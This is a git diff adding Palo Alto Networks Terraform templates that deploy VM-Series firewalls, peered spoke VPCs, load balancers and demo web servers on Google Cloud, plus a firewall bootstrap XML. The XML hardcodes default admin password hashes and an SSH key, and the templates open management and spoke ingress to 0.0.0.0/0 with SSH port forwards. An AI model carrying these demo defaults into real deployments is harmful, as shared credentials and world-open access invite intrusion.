+ default = "TCP" +} + +variable instances { + type = list(string) + default = null +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/main.tf new file mode 100755 index 00000000..bfc88575 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/main.tf @@ -0,0 +1,34 @@ +resource "google_compute_health_check" "default" { + name = "${var.name}-check-0" + + tcp_health_check { + port = var.health_check_port + } +} +resource "google_compute_region_backend_service" "default" { + count = length(var.backends) + name = "${var.name}-${count.index}" + health_checks = [google_compute_health_check.default.self_link] + network = var.network + + dynamic "backend" { + for_each = var.backends[count.index] + content { + group = lookup(backend.value, "group") + failover = lookup(backend.value, "failover") + } + } + session_affinity = "NONE" +} + +resource "google_compute_forwarding_rule" "default" { + count = length(var.backends) + name = "${var.name}-all-${count.index}" + load_balancing_scheme = "INTERNAL" + ip_address = var.ip_address + ip_protocol = var.ip_protocol + all_ports = var.all_ports + ports = var.ports + subnetwork = var.subnetworks[0] + backend_service = google_compute_region_backend_service.default[count.index].self_link +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/outputs.tf new file mode 100644 index 00000000..08589a14 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/outputs.tf @@ -0,0 +1,4 @@ +output forwarding_rule { + value = google_compute_forwarding_rule.default.*.self_link +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/variables.tf new file mode 100644 index 00000000..1e634c77 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/lb_tcp_internal/variables.tf @@ -0,0 +1,37 @@ +variable name { +} + +variable health_check_port { + default = "22" +} + +variable backends { + description = "Map backend indices to list of backend maps." 
+ type = map(list(object({ + group = string + failover = bool + }))) +} + +variable subnetworks { + type = list(string) +} + +variable ip_address { + default = null +} + +variable ip_protocol { + default = "TCP" +} +variable all_ports { + type = bool +} +variable ports { + type = list(string) + default = [] +} + +variable network { + default = null +} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vm/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vm/main.tf new file mode 100644 index 00000000..2f42125b --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vm/main.tf @@ -0,0 +1,45 @@ +resource "google_compute_instance" "default" { + count = length(var.names) + name = element(var.names, count.index) + machine_type = var.machine_type + zone = element(var.zones, count.index) + can_ip_forward = true + allow_stopping_for_update = true + metadata_startup_script = var.startup_script + + metadata = { + serial-port-enable = true + ssh-keys = var.ssh_key + } + + network_interface { + subnetwork = element(var.subnetworks, count.index) + } + + boot_disk { + initialize_params { + image = var.image + } + } + + service_account { + scopes = var.scopes + } +} + + +resource "google_compute_instance_group" "default" { + count = var.create_instance_group ? length(var.names) : 0 + name = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig" + zone = element(var.zones, count.index) + instances = [google_compute_instance.default[count.index].self_link] + + named_port { + name = "http" + port = "80" + } + + lifecycle { + create_before_destroy = true + } +} diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vm/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vm/outputs.tf new file mode 100644 index 00000000..3e4c700a --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vm/outputs.tf @@ -0,0 +1,11 @@ +output vm_names { + value = google_compute_instance.default.*.name +} + +output vm_self_link { + value = google_compute_instance.default.*.self_link +} + +output instance_group { + value = google_compute_instance_group.default.*.self_link +} diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vm/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vm/variables.tf new file mode 100644 index 00000000..03fa3cac --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vm/variables.tf @@ -0,0 +1,43 @@ +variable names { + type = list(string) +} + +variable machine_type { +} +variable create_instance_group { + type = bool + default = false +} + +variable instance_group_names { + type = list(string) + default = ["vmseries-instance-group"] +} +variable zones { + type = list(string) +} +variable ssh_key { + default = "" +} +variable image { +} + +variable subnetworks { + type = list(string) +} + +variable scopes { + type = list(string) + + default = [ + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable startup_script { + default = "" +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/main.tf new file mode 100644 index 00000000..c74ee4fa --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/main.tf @@ -0,0 +1,83 @@ +resource "null_resource" "dependency_getter" { + provisioner "local-exec" { + command = "echo ${length(var.dependencies)}" + } +} + 
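# Module-ordering note: dependency_getter above pairs with the dependency_setter and
# "completion" output in the gcp_bootstrap module. This is the usual pre-Terraform-0.13
# workaround for modules not supporting depends_on: fw_common.tf feeds
# module.bootstrap_common.completion into var.dependencies, so the firewalls are only
# created after the bootstrap bucket and its objects exist.
#
# Interface ordering note: the three network_interface blocks below consume
# var.subnetworks in order; fw_common.tf passes untrust, mgmt, trust. The dynamic
# access_config blocks attach an ephemeral public IP only where nic*_public_ip is true
# (nic0 and nic1 in this deployment), while nic2 (trust) stays private.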
+resource "google_compute_instance" "vmseries" { + count = length(var.names) + name = element(var.names, count.index) + machine_type = var.machine_type + zone = element(var.zones, count.index) + min_cpu_platform = var.cpu_platform + can_ip_forward = true + allow_stopping_for_update = true + tags = var.tags + + metadata = { + mgmt-interface-swap = var.mgmt_interface_swap + vmseries-bootstrap-gce-storagebucket = var.bootstrap_bucket + serial-port-enable = true + ssh-keys = var.ssh_key + } + + service_account { + scopes = var.scopes + } + + network_interface { + + dynamic "access_config" { + for_each = var.nic0_public_ip ? [""] : [] + content {} + } + network_ip = element(var.nic0_ip, count.index) + subnetwork = var.subnetworks[0] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic1_public_ip ? [""] : [] + content {} + } + network_ip = element(var.nic1_ip, count.index) + subnetwork = var.subnetworks[1] + } + + network_interface { + dynamic "access_config" { + for_each = var.nic2_public_ip ? [""] : [] + content {} + } + network_ip = element(var.nic2_ip, count.index) + subnetwork = var.subnetworks[2] + } + + boot_disk { + initialize_params { + image = var.image + type = var.disk_type + } + } + + depends_on = [ + null_resource.dependency_getter + ] +} + +resource "google_compute_instance_group" "vmseries" { + count = var.create_instance_group ? length(var.names) : 0 + name = "${element(var.names, count.index)}-${element(var.zones, count.index)}-ig" + zone = element(var.zones, count.index) + instances = [google_compute_instance.vmseries[count.index].self_link] + + named_port { + name = "http" + port = "80" + } + + lifecycle { + create_before_destroy = true + } +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/outputs.tf new file mode 100644 index 00000000..21b040a5 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/outputs.tf @@ -0,0 +1,24 @@ +output vm_names { + value = google_compute_instance.vmseries.*.name +} + +output vm_self_link { + value = google_compute_instance.vmseries.*.self_link +} + +output instance_group { + value = google_compute_instance_group.vmseries.*.self_link +} + +output nic0_public_ip { + value = var.nic0_public_ip ? google_compute_instance.vmseries.*.network_interface.0.access_config.0.nat_ip : [] +} + +output nic1_public_ip { + value = var.nic1_public_ip ? google_compute_instance.vmseries.*.network_interface.1.access_config.0.nat_ip : [] +} + +output nic2_public_ip { + value = var.nic2_public_ip ? 
google_compute_instance.vmseries.*.network_interface.2.access_config.0.nat_ip : [] +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/variables.tf new file mode 100644 index 00000000..9eaae5c9 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vmseries/variables.tf @@ -0,0 +1,102 @@ +variable subnetworks { + type = list(string) +} + +variable names { + type = list(string) +} + +variable machine_type { +} + +variable zones { + type = list(string) +} + +variable cpu_platform { + default = "Intel Broadwell" +} +variable disk_type { + default = "pd-ssd" + #default = "pd-standard" +} +variable bootstrap_bucket { + default = "" +} + +variable ssh_key { + default = "" +} + +variable public_lb_create { + default = false +} + +variable scopes { + type = list(string) + + default = [ + "https://www.googleapis.com/auth/compute.readonly", + "https://www.googleapis.com/auth/cloud.useraccounts.readonly", + "https://www.googleapis.com/auth/devstorage.read_only", + "https://www.googleapis.com/auth/logging.write", + "https://www.googleapis.com/auth/monitoring.write", + ] +} + +variable image { +} + +variable tags { + type = list(string) + default = [] +} + +variable create_instance_group { + type = bool + default = false +} + +variable instance_group_names { + type = list(string) + default = ["vmseries-instance-group"] +} + +variable dependencies { + type = list(string) + default = [] +} + +variable nic0_ip { + type = list(string) + default = [""] +} + +variable nic1_ip { + type = list(string) + default = [""] +} + +variable nic2_ip { + type = list(string) + default = [""] +} + +variable mgmt_interface_swap { + default = "" +} + +variable nic0_public_ip { + type = bool + default = false +} + +variable nic1_public_ip { + type = bool + default = false +} + +variable nic2_public_ip { + type = bool + default = false +} diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vpc/main.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/main.tf new file mode 100644 index 00000000..0c614e1d --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/main.tf @@ -0,0 +1,27 @@ +resource "google_compute_network" "default" { + name = var.vpc + delete_default_routes_on_create = var.delete_default_route + auto_create_subnetworks = false +} + +resource "google_compute_subnetwork" "default" { + count = length(var.subnets) + name = element(var.subnets, count.index) + ip_cidr_range = element(var.cidrs, count.index) + region = element(var.regions, count.index) + network = google_compute_network.default.self_link +} + +resource "google_compute_firewall" "default" { + count = length(var.allowed_sources) != 0 ? 
1 : 0 + name = "${google_compute_network.default.name}-ingress" + network = google_compute_network.default.self_link + direction = "INGRESS" + source_ranges = var.allowed_sources + + allow { + protocol = var.allowed_protocol + ports = var.allowed_ports + } +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vpc/outputs.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/outputs.tf new file mode 100644 index 00000000..3d64c11b --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/outputs.tf @@ -0,0 +1,24 @@ +output subnetwork_id { + value = google_compute_subnetwork.default.*.id +} + +output subnetwork_name { + value = google_compute_subnetwork.default.*.name +} + +output subnetwork_self_link { + value = google_compute_subnetwork.default.*.self_link +} + +output vpc_name { + value = google_compute_network.default.*.name +} + +output vpc_id { + value = google_compute_network.default.*.id[0] +} + +output vpc_self_link { + value = google_compute_network.default.*.self_link[0] +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/modules/vpc/variables.tf b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/variables.tf new file mode 100644 index 00000000..0f16be02 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/modules/vpc/variables.tf @@ -0,0 +1,33 @@ +variable vpc { +} + +variable subnets { + type = list(string) +} + +variable cidrs { + type = list(string) +} + +variable regions { + type = list(string) +} + +variable allowed_sources { + type = list(string) + default = [] +} + +variable allowed_protocol { + default = "all" +} + +variable allowed_ports { + type = list(string) + default = [] +} + +variable delete_default_route { + default = "false" +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/project.tf b/gcp/adv_peering_2fw_2spoke_common/project.tf new file mode 100644 index 00000000..375e7eae --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/project.tf @@ -0,0 +1,18 @@ +terraform { + required_version = ">= 0.12" +} + +provider "google" { + #credentials = var.auth_file + project = var.project_id + region = var.regions[0] +} + +provider "google-beta" { + #credentials = var.auth_file + project = var.project_id + region = var.regions[0] + version = "> 3.0.0" +} + +data "google_compute_zones" "available" {} \ No newline at end of file diff --git a/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php b/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php new file mode 100644 index 00000000..19c37318 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php @@ -0,0 +1,62 @@ + + SOURCE & DESTINATION ADDRESSES +
'; +echo ''. "INTERVAL" .': '. $time .'
'; +$localIPAddress = getHostByName(getHostName()); +$sourceIPAddress = getRealIpAddr(); +echo ''. "SOURCE IP" .': '. $sourceIPAddress .'
'; +echo ''. "LOCAL IP" .': '. $localIPAddress .'
'; + +$vm_name = gethostname(); +echo ''. "VM NAME" .': '. $vm_name .'
'; +echo ''. '
'; +echo ' + HEADER INFORMATION +
'; +/* All $_SERVER variables prefixed with HTTP_ are the HTTP headers */ +foreach ($_SERVER as $header => $value) { + if (substr($header, 0, 5) == 'HTTP_') { + /* Strip the HTTP_ prefix from the $_SERVER variable, what remains is the header */ + $clean_header = strtolower(substr($header, 5, strlen($header))); + + /* Replace underscores by the dashes, as the browser sends them */ + $clean_header = str_replace('_', '-', $clean_header); + + /* Cleanup: standard headers are first-letter uppercase */ + $clean_header = ucwords($clean_header, " \t\r\n\f\v-"); + + /* And show'm */ + echo ''. $header .': '. $value .'
'; + } +} +?> diff --git a/gcp/adv_peering_2fw_2spoke_common/scripts/webserver-startup.sh b/gcp/adv_peering_2fw_2spoke_common/scripts/webserver-startup.sh new file mode 100644 index 00000000..f799d23d --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/scripts/webserver-startup.sh @@ -0,0 +1,9 @@ +#!/bin/bash +sleep 120; +until sudo apt-get update; do echo "Retrying"; sleep 5; done +until sudo apt-get install -y php; do echo "Retrying"; sleep 5; done +until sudo apt-get install -y apache2; do echo "Retrying"; sleep 5; done +until sudo apt-get install -y libapache2-mod-php; do echo "Retrying"; sleep 5; done +until sudo rm -f /var/www/html/index.html; do echo "Retrying"; sleep 5; done +until sudo wget -O /var/www/html/index.php https://raw.githubusercontent.com/wwce/terraform/master/gcp/adv_peering_2fw_2spoke_common/scripts/showheaders.php; do echo "Retrying"; sleep 2; done +until sudo systemctl restart apache2; do echo "Retrying"; sleep 5; done diff --git a/gcp/adv_peering_2fw_2spoke_common/spokes.tf b/gcp/adv_peering_2fw_2spoke_common/spokes.tf new file mode 100644 index 00000000..f808f011 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/spokes.tf @@ -0,0 +1,113 @@ +#----------------------------------------------------------------------------------------------- +# Create spoke2 vpc with 2 web VMs (with internal LB). Create peer link with trust VPC. +module "vpc_spoke1" { + source = "./modules/vpc/" + vpc = var.spoke1_vpc + subnets = var.spoke1_subnets + cidrs = var.spoke1_cidrs + regions = var.regions + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} + +module "vm_spoke1" { + source = "./modules/vm/" + names = var.spoke1_vms + zones = [ + data.google_compute_zones.available.names[0], + data.google_compute_zones.available.names[1] + ] + subnetworks = [module.vpc_spoke1.subnetwork_self_link[0]] + machine_type = "f1-micro" + image = "ubuntu-os-cloud/ubuntu-1604-lts" + create_instance_group = true + ssh_key = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : "" + startup_script = file("${path.module}/scripts/webserver-startup.sh") +} + +module "ilb_web" { + source = "./modules/lb_tcp_internal/" + name = var.spoke1_ilb + subnetworks = [module.vpc_spoke1.subnetwork_self_link[0]] + all_ports = false + ports = ["80"] + health_check_port = "80" + ip_address = var.spoke1_ilb_ip + + backends = { + "0" = [ + { + group = module.vm_spoke1.instance_group[0] + failover = false + }, + { + group = module.vm_spoke1.instance_group[1] + failover = false + } + ] + } + providers = { + google = google-beta + } +} + +resource "google_compute_network_peering" "trust_to_spoke1" { + name = "${var.trust_vpc}-to-${var.spoke1_vpc}" + provider = google-beta + network = module.vpc_trust.vpc_self_link + peer_network = module.vpc_spoke1.vpc_self_link + export_custom_routes = true +} + +resource "google_compute_network_peering" "spoke1_to_trust" { + name = "${var.spoke1_vpc}-to-${var.trust_vpc}" + provider = google-beta + network = module.vpc_spoke1.vpc_self_link + peer_network = module.vpc_trust.vpc_self_link + import_custom_routes = true + + depends_on = [google_compute_network_peering.trust_to_spoke1] +} + +#----------------------------------------------------------------------------------------------- +# Create spoke2 vpc with VM. Create peer link with trust VPC. 
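+# Note on routing: both spoke VPCs are created with delete_default_route = true, so their
+# egress path comes from custom routes imported from the trust VPC over these peerings
+# (export_custom_routes on the trust side, import_custom_routes on the spoke side). The
+# depends_on chain serializes peering creation, since GCP processes only one peering
+# change per VPC at a time.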
+module "vpc_spoke2" { + source = "./modules/vpc/" + vpc = var.spoke2_vpc + subnets = var.spoke2_subnets + cidrs = var.spoke2_cidrs + regions = var.regions + allowed_sources = ["0.0.0.0/0"] + delete_default_route = true +} + +module "vm_spoke2" { + source = "./modules/vm/" + names = var.spoke2_vms + zones = [data.google_compute_zones.available.names[0]] + machine_type = "f1-micro" + image = "ubuntu-os-cloud/ubuntu-1604-lts" + subnetworks = [module.vpc_spoke2.subnetwork_self_link[0]] + ssh_key = fileexists(var.public_key_path) ? "${var.spoke_user}:${file(var.public_key_path)}" : "" +} + +resource "google_compute_network_peering" "trust_to_spoke2" { + name = "${var.trust_vpc}-to-${var.spoke2_vpc}" + provider = google-beta + network = module.vpc_trust.vpc_self_link + peer_network = module.vpc_spoke2.vpc_self_link + export_custom_routes = true + + depends_on = [google_compute_network_peering.spoke1_to_trust] +} + +resource "google_compute_network_peering" "spoke2_to_trust" { + name = "${var.spoke2_vpc}-to-${var.trust_vpc}" + provider = google-beta + network = module.vpc_spoke2.vpc_self_link + peer_network = module.vpc_trust.vpc_self_link + import_custom_routes = true + + depends_on = [google_compute_network_peering.trust_to_spoke2] +} + diff --git a/gcp/adv_peering_2fw_2spoke_common/terraform.tfvars b/gcp/adv_peering_2fw_2spoke_common/terraform.tfvars new file mode 100644 index 00000000..74734aad --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/terraform.tfvars @@ -0,0 +1,42 @@ +#project_id = "" # Your project ID for the deployment +#public_key_path = "~/.ssh/gcp-demo.pub" # Your SSH Key + +#fw_panos = "byol-904" # Uncomment for PAN-OS 9.0.4 - BYOL +#fw_panos = "bundle1-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 1 +#fw_panos = "bundle2-904" # Uncomment for PAN-OS 9.0.4 - PAYG Bundle 2 + + +#------------------------------------------------------------------- +regions = ["us-east4"] + +mgmt_vpc = "mgmt-vpc" +mgmt_subnet = ["mgmt"] +mgmt_cidr = ["192.168.0.0/24"] +mgmt_sources = ["0.0.0.0/0"] + +untrust_vpc = "untrust-vpc" +untrust_subnet = ["untrust"] +untrust_cidr = ["192.168.1.0/24"] + +trust_vpc = "trust-vpc" +trust_subnet = ["trust"] +trust_cidr = ["192.168.2.0/24"] + +spoke1_vpc = "spoke1-vpc" +spoke1_subnets = ["spoke1-subnet1"] +spoke1_cidrs = ["10.1.0.0/24"] +spoke1_vms = ["spoke1-vm1", "spoke1-vm2"] +spoke1_ilb = "spoke1-intlb" +spoke1_ilb_ip = "10.1.0.100" + +spoke2_vpc = "spoke2-vpc" +spoke2_subnets = ["spoke2-subnet1"] +spoke2_cidrs = ["10.2.0.0/24"] +spoke2_vms = ["spoke2-vm1"] +spoke_user = "demo" + +fw_names_common = ["vmseries01", "vmseries02"] +fw_machine_type = "n1-standard-4" + +extlb_name = "vmseries-extlb" +intlb_name = "vmseries-intlb" diff --git a/gcp/adv_peering_2fw_2spoke_common/variables.tf b/gcp/adv_peering_2fw_2spoke_common/variables.tf new file mode 100644 index 00000000..a33106a5 --- /dev/null +++ b/gcp/adv_peering_2fw_2spoke_common/variables.tf @@ -0,0 +1,113 @@ +variable project_id { + description = "GCP Project ID" +} + +variable auth_file { + description = "GCP Project auth file" + default = "" +} + +variable regions { +} + +variable fw_panos { + description = "VM-Series license and PAN-OS (ie: bundle1-814, bundle2-814, or byol-814)" +} + +variable fw_image { + default = "https://www.googleapis.com/compute/v1/projects/paloaltonetworksgcp-public/global/images/vmseries" +} + +variable fw_names_common { + type = list(string) +} + +variable fw_machine_type { +} + +variable extlb_name { +} + +variable intlb_name { +} + +variable mgmt_vpc { +} + +variable 
mgmt_subnet { + type = list(string) +} + +variable mgmt_cidr { + type = list(string) +} + +variable untrust_vpc { +} + +variable untrust_subnet { + type = list(string) +} + +variable untrust_cidr { + type = list(string) +} + +variable trust_vpc { +} + +variable trust_subnet { + type = list(string) +} + +variable trust_cidr { + type = list(string) +} + +variable mgmt_sources { + type = list(string) +} + +variable spoke1_vpc { +} + +variable spoke1_subnets { + type = list(string) +} + +variable spoke1_cidrs { + type = list(string) +} + +variable spoke1_vms { + type = list(string) +} + +variable spoke1_ilb { +} + +variable spoke1_ilb_ip { +} + +variable spoke2_vpc { +} + +variable spoke2_subnets { + type = list(string) +} + +variable spoke2_cidrs { + type = list(string) +} + +variable spoke2_vms { + type = list(string) +} + +variable spoke_user { + description = "SSH user for spoke Linux VM" +} + +variable public_key_path { + description = "Local path to public SSH key. If you do not have a public key, run >> ssh-keygen -f ~/.ssh/demo-key -t rsa -C admin" +} diff --git a/gcp/adv_peering_4fw_2spoke/README.md b/gcp/adv_peering_4fw_2spoke/README.md new file mode 100644 index 00000000..c07f719e --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/README.md @@ -0,0 +1,40 @@ +## 4 x VM-Series / 2 x Spoke VPCs via Advanced Peering / ILBNH + +Terraform creates 4 VM-Series firewalls that secure ingress/egress traffic from spoke VPCs. The spoke VPCs are connected (via VPC Peering) to the VM-Series trust VPC. All TCP/UDP traffic originating from the spokes is routed to the internal load balancers. + +Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/adv_peering_4fw_2spoke/guide.pdf) for more information. + +### Diagram +
+![diagram](diagram.png)
+ + +### Prerequisites +1. Valid GCP Account + +### How To +Setup Project (all commands are run from Google Cloud Shell or from a local machine with Terraform 0.12 installed) +``` + $ gcloud services enable compute.googleapis.com + $ ssh-keygen -f ~/.ssh/ -t rsa -C + $ git clone https://github.com/wwce/terraform; cd terraform/gcp/adv_peering_4fw_2spoke +``` + +Run Build +``` + # Edit terraform.tfvars to match project ID, SSH Key, and PAN-OS version and license. + + $ terraform init + $ terraform apply +``` + +Destroy Build +``` + $ terraform destroy +``` + +## Support Policy +The guide in this directory and accompanying files are released under an as-is, best-effort support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product (the VM-Series firewall) used by the scripts or templates is still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself. +Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy. diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes new file mode 100644 index 00000000..0519ecba --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/authcodes @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml new file mode 100644 index 00000000..e7e275ee --- /dev/null +++ b/gcp/adv_peering_4fw_2spoke/bootstrap_files/fw_inbound/bootstrap.xml @@ -0,0 +1,898 @@ + + + + + + + + yes + + + $1$omtpasik$JVuMCKVuxaIHBIkdrbR4k. + + + + + yes + + + $1$kpolrmjb$lJ5t7tCjS7Ghd8tachjOJ.
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDcHcrYU13Si9nTlJQZHhVM3d6RjMrWjZod1VtK1NLcVY2Snh4NWRJUUhwRkc2UVlKK2ZibFgyQmNoMzl0L0pBbXFiTm1OVm1kS3JOMVdwdjY3Y3J5SHNJYkRoOHFpMGZZS25ZZ1o5S0F6Nk1wWTgrMXdxbTR2dktXNXVSZU85YnhvNFRLNVIySUdVWnd1ZU0xZ0F5Q0xVWFA2ZnBsY3VQYUxvTDkvb2NuUUY0TUJKajhpOTkrZTNlcTUwd0w5YTgxTndVUVhuVzlDUXVqd0E2aVU0QytLU0tYTy91YVVlWEJ4YVVzVG92Y0FnKzFBVXdUdHJuSW1ySWNjYXllZy9ReXVTR2lZaEpOVTRLL2VNNkxJODlFMTBrR25JcTZTOEEzRUFtYU9IcUh3SFpsenJ3RlZJZFUxVVRhb1ArZXRna2I3TWNuUDQzOGtsa1JNcVRwMnNyakggdWJ1bnR1 + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + + + + + + + + + + + + yes + + + + + no + + + + + no + + + yes + + 1460 + + no + + + + + + + no + + + + + no + + + + + no + + + yes + + 1460 + + no + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + no + + + 1.25 + 0.5 + 900 + 300 + 900 + yes + + + + + yes + + + + + no + + + no + + + no + + + + ethernet1/1 + ethernet1/2 + + + + + + + + + + + + 192.168.1.1 + + + None + + + no + any + 2 + + ethernet1/1 + 10 + 0.0.0.0/0 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 10.10.1.0/24 + + + + + + + no + any + 2 + + + 192.168.2.1 + + + None + + ethernet1/2 + 10 + 10.10.2.0/24 + + + + + + + + + + + + + updates.paloaltonetworks.com + + + + + download-and-install + 15 + + + + + + + download-and-install + 30 + + + + + US/Pacific + + yes + yes + + vm-series + + + 208.67.222.222 + 208.67.220.220 + + + + + yes + no + yes + no + + + yes + + no + + + + + yes + + + FQDN + + + + yes + no + yes + no + + + 8.8.8.8 + 4.2.2.2 + mgmt-interface-swap + + + + + + + + + + + + + ethernet1/1 + + + + + + + ethernet1/2 + + + + + + + + + 22 + + + + + + + 221 + + + + + + + 222 + + + + + + + + + + + + any + + + any + + + any + + + any + + + any + + + any + + + ping + + + application-default + + + any + + yes + yes + allow + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + web-browsing + + + application-default + + + any + + yes + yes + allow + + + + trust + + + untrust + + + any + + + any + + + any + + + any + + + ssh + + + tcp-221 + tcp-222 + + + any + + yes + yes + allow + no + If required, this enables SSH access from the VM-Series untrust elastic/public IP to the web-server over TCP/221 and the db-server over TCP/222. 
+ + + + + + + + + + ethernet1/2 + + + + + untrust + + + untrust + + + any + + + any + + service-http + ipv4 + no + + spoke1-intlb + 80 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + untrust + + + untrust + + + any + + + any + + tcp-221 + ipv4 + + spoke1-vm + 22 + + ethernet1/1 + + + + + + ethernet1/2 + + + + + untrust + + + untrust + + + any + + + any + + tcp-222 + ipv4 + + spoke2-vm + 22 + + ethernet1/1 + + + + + + + deny + no + yes + + + deny + no + yes + + + + + + + + + + + any + + + any + + + critical + + any + client + any + disable + + + + + + + any + + + any + + + high + + any + client + any + disable + + + + + + + any + + + any + + + medium + + any + client + any + disable + + + + + + + any + + + any + + + critical + + any + server + any + disable + + + + + + + any + + + any + + + high + + any + server + any + disable + + + + + + + any + + + any + + + medium + + any + server + any + disable + + + + + + + + + + + + + WW's profile + + + +
+ + 10.10.2.2 + + spoke2-vpc + + + + 10.10.1.2 + + spoke1-vpc + + + + 10.10.1.0/24 + + spoke1-vpc + + + + 10.10.2.0/24 + + spoke2-vpc + + + + 10.10.1.100 + + spoke1-vpc + + +
+ + + + ethernet1/1 + ethernet1/2 + + + + + + color3 + + + color24 + + + color20 + + + color13 + + + +
+
+
+
+
